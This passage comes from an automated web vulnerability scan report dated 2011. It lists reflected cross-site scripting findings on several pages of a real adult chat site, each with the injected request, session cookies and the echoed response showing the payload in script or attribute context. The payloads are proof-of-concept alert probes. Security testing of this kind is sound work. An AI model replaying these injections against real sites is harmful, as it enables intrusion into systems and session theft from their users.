Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/live-sex-video/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f783'-alert(1)-'ad3501b39a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/live-sex-video/?7f783'-alert(1)-'ad3501b39a0=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:16 GMT Connection: close Content-Length: 25590 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/videoslibrary.aspx&he=imlive.com&ul=/live-sex-chats/live-sex-video/?7f783'-alert(1)-'ad3501b39a0=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
2.100. http://imlive.com/live-sex-chats/live-sex-video/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/live-sex-video/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6088"><a>d342b9399fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/live-sex-video/?e6088"><a>d342b9399fb=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:03 GMT Connection: close Content-Length: 25443 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/live-sex-video/?e6088"><a>d342b9399fb=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.101. http://imlive.com/live-sex-chats/nude-chat/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/nude-chat/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acb7a'-alert(1)-'34ec5f17816 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/nude-chat/?acb7a'-alert(1)-'34ec5f17816=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:29 GMT Connection: close Content-Length: 23794 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/keyholesexplanation.aspx&he=imlive.com&ul=/live-sex-chats/nude-chat/?acb7a'-alert(1)-'34ec5f17816=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
2.102. http://imlive.com/live-sex-chats/nude-chat/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/nude-chat/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f06eb"><a>2a1bdec8937 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/nude-chat/?f06eb"><a>2a1bdec8937=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:23 GMT Connection: close Content-Length: 23647 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/nude-chat/?f06eb"><a>2a1bdec8937=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.103. http://imlive.com/live-sex-chats/orgies/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/orgies/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44239'-alert(1)-'0a5659e80e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/orgies/?44239'-alert(1)-'0a5659e80e9=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:29 GMT Connection: close Content-Length: 49856 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/orgies/?44239'-alert(1)-'0a5659e80e9=1&qs=cat=1^roomid=14^44239'-alert(1)-'0a5659e80e9=1&qs=cat=1^roomid=14^44239'-alert(1)-'0a5659e80e9=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb ...[SNIP]...
2.104. http://imlive.com/live-sex-chats/orgies/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/orgies/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b235"><a>bd631be4c53 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/orgies/?4b235"><a>bd631be4c53=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:05 GMT Connection: close Content-Length: 49672 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/orgies/?4b235"><a>bd631be4c53=1"> ...[SNIP]...
2.105. http://imlive.com/live-sex-chats/pornstars/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/pornstars/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd6ca'-alert(1)-'66a39635b46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/pornstars/?dd6ca'-alert(1)-'66a39635b46=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:42 GMT Connection: close Content-Length: 266553 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/pornstars/?dd6ca'-alert(1)-'66a39635b46=1&qs=cat=1^roomid=249^dd6ca'-alert(1)-'66a39635b46=1&qs=cat=1^roomid=249^dd6ca'-alert(1)-'66a39635b46=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63 ...[SNIP]...
2.106. http://imlive.com/live-sex-chats/pornstars/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/pornstars/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad2c2"><a>388c8c895ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/pornstars/?ad2c2"><a>388c8c895ab=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:36 GMT Connection: close Content-Length: 266390 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/pornstars/?ad2c2"><a>388c8c895ab=1"> ...[SNIP]...
2.107. http://imlive.com/live-sex-chats/role-play/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/role-play/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43819"><a>7fb20b0957a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/role-play/?43819"><a>7fb20b0957a=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; 